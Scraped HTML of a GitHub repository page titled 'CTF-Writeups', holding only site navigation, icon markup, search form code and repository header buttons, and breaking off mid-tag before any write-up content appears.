<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="426049755" data-scoped-search-url="/palanioffcl/CTF-Writeups/search" data-owner-scoped-search-url="/users/palanioffcl/search" data-unscoped-search-url="/search" data-turbo="false" action="/palanioffcl/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="x0KLdHAOIGPy+7qGCcTBeepydiXXhtWhiuSVePDvZskrgF12vxMOAGtwdN8wDdnsnRsPtuqq3S6qi1LPSWBroA==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> palanioffcl </span> <span>/</span> CTF-Writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>0</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 